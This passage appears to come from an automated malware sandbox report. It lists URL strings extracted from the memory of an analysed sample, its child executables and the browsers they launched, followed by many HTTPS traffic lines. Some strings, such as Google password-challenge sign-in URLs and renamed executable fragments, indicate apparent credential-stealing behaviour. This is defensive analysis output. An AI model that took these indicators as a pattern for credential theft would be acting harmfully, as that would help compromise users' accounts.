Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006184749.00006DEC00840000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0718eb7837.exe, 0000000E.00000003.2800298757.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2745898979.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2777576884.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2801780586.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEM
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943434775.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940508064.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2943608468.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2940443306.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: chrome.exe, 00000022.00000003.2883243681.00006DEC00EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2879059673.00006DEC00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995804645.00006DEC002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010230878.00006DEC00A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998895852.00006DEC0042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2878914967.00006DEC00CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006184749.00006DEC00840000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3003100882.00006DEC006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002436204.00006DEC00628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000022.00000002.3008065191.00006DEC00988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2938535672.00006DEC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000022.00000002.3008065191.00006DEC00988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006787029.00006DEC00884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2938535672.00006DEC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000022.00000002.3007568961.00006DEC0091C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378294380.0000024F74BCE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3002436204.00006DEC00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005526682.00006DEC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3000146446.00006DEC004FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378294380.0000024F74BCE000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3378129656.0000024F74B55000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3001497541.00006DEC005D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013398134.00006DEC00BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2031655381.00000000236B6000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2720440308.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 0000001F.00000002.2899808146.0000023BA08CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FB57000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.2031655381.00000000236B6000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2720440308.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2898670007.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2130376795.0000000000C94000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: firefox.exe, 0000001F.00000002.2898864384.0000023BA0650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 00000021.00000002.2901452031.00000139663A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig;
Source: firefox.exe, 00000021.00000002.2897094701.000001396603A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901452031.00000139663A4000.00000004.00000020.00020000.00000000.sdmp, 2922d7c574.exe, 00000025.00000003.2950012416.0000000001654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F64403000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3120454530.0000024F64090000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F6445D000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3120454530.0000024F640A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3121458073.0000024F641C0000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F73761000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000021.00000002.2897094701.0000013966030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd(
Source: firefox.exe, 0000001C.00000002.2773952391.000002C86DDE0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781201402.00000196D420B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3120454530.0000024F640A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA0500000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898864384.0000023BA0654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901452031.00000139663A4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2897094701.0000013966030000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3159881754.0000024F65CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
